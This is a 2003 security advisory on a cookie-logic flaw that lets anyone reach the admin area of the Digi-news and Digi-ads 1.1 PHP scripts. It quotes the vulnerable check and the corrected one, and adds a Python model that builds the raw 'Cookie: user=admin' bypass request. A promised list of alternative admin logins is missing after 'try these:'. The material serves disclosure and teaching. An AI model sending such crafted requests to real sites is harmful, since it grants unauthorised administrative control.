
Digi-news and Digi-ads version 1.1 admin access without password


Overview


Discovered on March 30th, 2003
Vendor: Digi-FX

Digi-news 1.1 is a PHP news editor. It allows you to easily add, edit, and delete news items.
Digi-ads 1.1 is a PHP ad rotator. It allows you to easily add, edit, reset, and delete ads.
A vulnerability gives access to the admin area of both scripts without the administrator password.

Risk


Exploit easiness: 5/5
Vulnerability spreading: 2/5
Impact: 5/5
Risk: 4/5

Details


In Digi-news and Digi-ads, the admin web page is admin.php.
Here is a sample of the admin authentication code in admin.php:

if (!isset($action)) {
   $action = '';          // $action is expected to arrive as a request parameter
}
if ($action == 'auth') {
   auth();                // processes the login form
}
// BUG: the login page is only forced when BOTH cookies are wrong (&&),
// so a single matching cookie (user or pass) is enough to get past this check
if ((@$HTTP_COOKIE_VARS['user'] != $digiNews['user']) && (@$HTTP_COOKIE_VARS['pass'] != md5($digiNews['pass']))) {
   login();
   exit;
}
// ... the rest of admin.php runs as a logged-in admin


As you can see, the authentication scheme is based on a cookie. This cookie contains the user name and the MD5 hash of the password. But the programmer made a mistake:
if ((@$HTTP_COOKIE_VARS['user'] != $digiNews['user']) && (@$HTTP_COOKIE_VARS['pass'] != md5($digiNews['pass']))) {
The login page is only forced when BOTH comparisons fail ("user cookie is wrong" AND "pass cookie is wrong"). Negate that and you get the condition under which the admin code is reached: "user cookie = admin login" OR "pass cookie = MD5 of the admin password". In plain English, you don't need the admin password as long as you know the admin login; you don't even have to send a "pass" cookie, because a missing cookie simply fails the second comparison, which no longer matters once the first one succeeds.
The default admin login is "admin". If it doesn't work, try these:

Exploit


OK, that's quite easy. You just have to send a hand-crafted cookie containing user=admin (the admin login) and no "pass" cookie at all. You can do that with the well-known Proxomitron, a local filtering HTTP proxy that lets you rewrite request headers. Here is a proof of concept:


[Screenshot: regular HTTP GET request for admin.php, without any cookie]
You get the authentication page.

[Screenshot: the same HTTP GET request with a "Cookie: user=admin" header added]
You get the admin page!

Solution


The solution is to replace the AND operator by an OR operator, so that the login page is forced as soon as either the user cookie or the password cookie is wrong:
if ((@$HTTP_COOKIE_VARS['user'] != $digiNews['user']) || (@$HTTP_COOKIE_VARS['pass'] != md5($digiNews['pass']))) {
Note that even with this fix the cookie still carries a static, unsalted MD5 of the admin password, so anyone who captures that cookie value can replay it (or crack the hash offline); the fix closes the logic flaw, not the weak cookie design.
The vendor has been informed and has fixed the problem. Download Digi-News 1.2 and Digi-ads 1.2.
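As an added example (not code from this advisory, nor from Digi-FX), the following Python models the admin.php check quoted in the Details section and the corrected one from the Solution section side by side, runs both over a set of constructed cookie scenarios, and builds the raw HTTP request the proof of concept sends. The configuration values, host name and function names are assumptions; PHP's loose != on cookie strings is modelled with Python's != on strings, and a missing cookie compares as None, just as the @-suppressed PHP lookup compares as NULL.

```python
import hashlib

# Constructed sample configuration standing in for $digiNews['user'] and
# $digiNews['pass'] in admin.php (the values are assumptions, not product defaults).
DIGI_NEWS = {"user": "admin", "pass": "correct-horse"}


def md5_hex(text: str) -> str:
    """Same transformation as PHP's md5(): hex digest of the string's bytes."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def vulnerable_admin_check(cookies: dict, config: dict = DIGI_NEWS) -> bool:
    """Digi-news/Digi-ads 1.1 logic: login() is forced only when BOTH cookie
    comparisons fail, so one matching cookie is enough to reach the admin code."""
    user_wrong = cookies.get("user") != config["user"]
    pass_wrong = cookies.get("pass") != md5_hex(config["pass"])
    show_login = user_wrong and pass_wrong
    return not show_login


def fixed_admin_check(cookies: dict, config: dict = DIGI_NEWS) -> bool:
    """Version 1.2 logic: login() is forced when EITHER comparison fails."""
    user_wrong = cookies.get("user") != config["user"]
    pass_wrong = cookies.get("pass") != md5_hex(config["pass"])
    show_login = user_wrong or pass_wrong
    return not show_login


def exploit_request(host: str, user: str = "admin", path: str = "/admin.php") -> str:
    """Raw request a header-rewriting proxy such as Proxomitron would send for
    the proof of concept: only a 'user' cookie, no 'pass' cookie at all."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: user={user}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )


def access_matrix(config: dict = DIGI_NEWS) -> dict:
    """For each constructed cookie set, whether the admin code is reached
    under the 1.1 check and under the 1.2 check: {name: (vulnerable, fixed)}."""
    good_hash = md5_hex(config["pass"])
    scenarios = {
        "no cookies": {},
        "user only (the PoC)": {"user": config["user"]},
        "user ok, pass wrong": {"user": config["user"], "pass": md5_hex("guess")},
        "pass hash only": {"pass": good_hash},
        "both correct": {"user": config["user"], "pass": good_hash},
        "both wrong": {"user": "nobody", "pass": md5_hex("guess")},
    }
    return {
        name: (vulnerable_admin_check(c, config), fixed_admin_check(c, config))
        for name, c in scenarios.items()
    }


if __name__ == "__main__":
    print(exploit_request("digi.example"))  # assumed host name
    for name, (vuln, fixed) in access_matrix().items():
        print(f"{name:22} 1.1 admin={vuln!s:5} 1.2 admin={fixed!s:5}")
```

Only the "both correct" row reaches the admin code under the corrected check; under the 1.1 check every row except "no cookies" and "both wrong" does, which is exactly the OR semantics the Details section describes.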

Discovered by


Arnaud Jacques aka scrap
webmaster@securiteinfo.com

© 2004-2019 - All rights reserved - SecuriteInfo.com